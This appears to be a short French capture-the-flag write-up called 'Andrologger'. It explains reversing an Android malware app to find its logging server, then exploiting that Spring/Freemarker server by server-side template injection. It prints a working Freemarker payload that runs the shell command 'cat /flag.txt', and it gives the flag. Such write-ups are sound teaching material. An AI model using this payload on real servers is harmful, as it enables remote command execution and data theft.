# Andrologger

Il faut tout d'abord trouver l'url du serveur en reversant l'application.
Pour ça Jadx, Apktool ou même un String sur le dex de l'apk suffiront.

Ensuite on comprend en reversant le code que le malware envoit ses logs en body par JSON sur https://andrologger.aperictf.fr/HjRn9hbrrKbE44CS

Aprés un peu de recherche on voit que le serveur est un serveur Spring avec Freemarker et que l'on peut l'exploiter avec une Server Side Template Injection:

`${"freemarker.template.utility.Execute"?new()("cat /flag.txt")}`

Flag : `APRK{kjlqsdlkqsdqskldjqlskdqlskdjqskldjqslkdqklsdqskldjqjqsdklqskldqj}`
